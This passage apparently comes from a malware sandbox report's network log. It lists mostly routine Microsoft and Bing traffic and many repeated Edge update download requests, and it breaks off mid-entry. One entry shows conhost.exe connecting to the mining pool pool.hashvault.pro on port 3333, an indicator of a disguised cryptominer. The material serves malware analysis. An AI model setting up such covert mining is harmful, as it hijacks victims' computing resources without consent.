                https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release
                Remote address:
                172.165.61.93:443
                Request
                GET /windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release HTTP/2.0
                host: data-edge.smartscreen.microsoft.com
                accept-encoding: gzip, deflate
                if-none-match: "638004170464094982"
                accept: application/x-patch, application/octet-stream
                user-agent: SmartScreen/2814751014978588
                authorization: SmartScreenPlain eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUifQ==
                Response
                HTTP/2.0 304
                date: Tue, 11 Feb 2025 16:57:47 GMT
                content-length: 0
                server: Kestrel
                cache-control: max-age=86400
                request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
              • 150.171.28.10:443
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid=
                tls, http2
                2.3kB
                9.8kB
                22
                18

                HTTP Request

                GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid=

                HTTP Response

                204

                HTTP Request

                GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid=

                HTTP Response

                204

                HTTP Request

                GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid=

                HTTP Response

                204
              • 192.248.189.11:3333
                pool.hashvault.pro
                tls
                conhost.exe
                19.6kB
                49.3kB
                158
                120
              • 52.252.28.242:443
                https://msedge.api.cdp.microsoft.com/api/v1.1/internal/contents/Browser/namespaces/Default/names/msedge-stable-win-x64/versions/132.0.2957.140/files?action=GenerateDownloadInfo&foregroundPriority=false
                tls, http2
                5.3kB
                13.8kB
                24
                21

                HTTP Request

                POST https://msedge.api.cdp.microsoft.com/api/v2/contents/Browser/namespaces/Default/names?action=batchupdates

                HTTP Response

                200

                HTTP Request

                POST https://msedge.api.cdp.microsoft.com/api/v1.1/internal/contents/Browser/namespaces/Default/names/msedge-stable-win-x64/versions/132.0.2957.140/files?action=GenerateDownloadInfo&foregroundPriority=false

                HTTP Response

                200
              • 91.80.49.86:80
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                http
                7.4MB
                192.9MB
                112778
                138265

                HTTP Request

                HEAD http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                200

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

